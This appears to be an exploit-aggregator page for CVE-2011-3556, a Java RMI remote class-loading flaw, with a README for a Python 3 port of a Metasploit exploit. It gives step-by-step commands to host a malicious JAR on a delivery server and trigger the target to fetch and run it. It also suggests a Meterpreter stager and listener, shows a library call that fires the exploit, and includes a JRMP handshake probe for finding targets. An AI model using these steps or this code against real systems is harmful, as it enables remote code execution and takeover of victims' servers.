PoC details: 8b89efcb6a545eea0021ab5db4c1998677daf7e4

Source
Related vulnerability
Title: Oracle 'Java Runtime Environment' component security vulnerability (CVE-2011-3556)
Description: Oracle Java SE is the standard-edition Java platform from Oracle Corporation (USA), used to develop and deploy Java applications for desktops, servers, embedded devices and real-time environments. An unspecified vulnerability exists in the Java Runtime Environment component of Oracle Java SE JDK and JRE 7; 6 Update 27 and earlier; 5.0 Update 31 and earlier; 1.4.2_33 and earlier; and JRockit R28.1.4 and earlier. A remote attacker can affect confidentiality, integrity and availability via vectors related to RMI.
Description
Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).
Introduction
# CVE-2011-3556 — Proof of Concept (PoC)

## Disclaimer

This tool is a Python 3 implementation of an existing [proof of concept (PoC)](https://www.exploit-db.com/raw/17535) made by mihi for the [Metasploit Framework](https://www.metasploit.com/).

## Prerequisites

To use the module, simply follow the instructions below:

```sh
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"
```

## Usage

### Command-line

The PoC makes the target's Java RMI registry load a class from a remote codebase: the payload (a JAR) must therefore be served over HTTP at a URL the *target* can reach, since it is the RMI server, not the attacker, that fetches it. Python's built-in `python3 -m http.server` is enough to serve it. This remote class loading only happens when the target's `java.rmi.server.useCodebaseOnly` property is `false`, which was the default before JDK 7u21 changed it to `true`; a hardened or newer JVM will ignore the codebase URL and the exploit will not fire.

Once the payload is made available for download, simply execute the `exploit.py` script to trigger the vulnerability.

```sh
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar
```

> If the payload is a Meterpreter stager (Metasploit Framework), remember to start the listener with `use exploit/multi/handler` before triggering the exploit.
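Before pointing the PoC at a host it helps to confirm that the port actually speaks JRMP (the RMI wire protocol) rather than, say, an HTTP or JMX listener. The following is an added example, not code from this repository or from the original Metasploit module: it builds the JRMP client hello, parses the `ProtocolAck` the registry answers with (the client's host and port as the server sees them), and wraps both in a small probe. The sample reply bytes, the `10.0.0.5` address and the `probe_rmi_registry` helper are constructed for illustration.

```python
import socket
import struct

# JRMP transport constants, as defined by the Java RMI wire protocol
# (magic "JRMI", version 2, StreamProtocol selector, ack/nack replies).
JRMI_MAGIC = b"JRMI"
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B
PROTOCOL_ACK = 0x4E
PROTOCOL_NACK = 0x4F


def build_jrmp_handshake():
    """Client hello: 4-byte magic, 2-byte version, 1-byte protocol selector."""
    return JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, STREAM_PROTOCOL)


def parse_protocol_ack(data):
    """Parse the server's reply to the hello.

    For StreamProtocol the server sends a ProtocolAck byte followed by the
    endpoint it sees the client on: a UTF string with a 2-byte length prefix
    and a 4-byte big-endian port. Returns (host, port); raises ValueError for
    anything that is not a well-formed JRMP ack (e.g. an HTTP banner).
    """
    if not data:
        raise ValueError("empty response")
    if data[0] == PROTOCOL_NACK:
        raise ValueError("server sent ProtocolNack")
    if data[0] != PROTOCOL_ACK:
        raise ValueError("not a JRMP ProtocolAck (first byte 0x%02x)" % data[0])
    if len(data) < 3:
        raise ValueError("truncated ProtocolAck")
    (host_len,) = struct.unpack(">H", data[1:3])
    end = 3 + host_len
    if len(data) < end + 4:
        raise ValueError("truncated endpoint identifier")
    host = data[3:end].decode("utf-8")
    (port,) = struct.unpack(">I", data[end:end + 4])
    return host, port


def build_endpoint_message(host, port):
    """Client's follow-up: the endpoint it wants callbacks on, same encoding
    as the server's (UTF string + 4-byte port). Java clients send port 0."""
    encoded = host.encode("utf-8")
    return struct.pack(">H", len(encoded)) + encoded + struct.pack(">I", port)


def probe_rmi_registry(host, port=1099, timeout=5.0):
    """Complete the JRMP handshake against a live host (hypothetical helper,
    not part of the PoC). Returns the (host, port) the registry reported."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_jrmp_handshake())
        seen_host, seen_port = parse_protocol_ack(sock.recv(1024))
        # Finish the handshake so the server does not log a protocol error.
        sock.sendall(build_endpoint_message(seen_host, 0))
        return seen_host, seen_port


# Constructed sample of a ProtocolAck as a registry would send it: the server
# reports that it sees the client as 10.0.0.5, source port 50000.
SAMPLE_ACK = (bytes([PROTOCOL_ACK])
              + struct.pack(">H", 8) + b"10.0.0.5"
              + struct.pack(">I", 50000))

if __name__ == "__main__":
    print(build_jrmp_handshake().hex())
    print(parse_protocol_ack(SAMPLE_ACK))
```

A `ValueError` from `parse_protocol_ack` (for instance on an `HTTP/1.1 400` banner) means the port is not a JRMP endpoint and the PoC cannot apply to it; a clean ack only confirms JRMP, not that remote class loading is enabled.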

### Library

This tool can also be used as a library by importing the `cve_2011_3556` module into your current namespace (the module lives under `lib/`, so that directory must be on `sys.path`):

```python
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()
```

It's as simple as that!

## Credits

Special thanks to mihi for the initial implementation of the Metasploit Framework [module](https://www.exploit-db.com/raw/17535).
File snapshot

```
[4.0K] /data/pocs/8b89efcb6a545eea0021ab5db4c1998677daf7e4
├── [3.2K] exploit.py
├── [4.0K] lib
│   └── [6.3K] cve_2011_3556.py
├── [ 138] Pipfile
└── [1.6K] README.md

1 directory, 4 files
```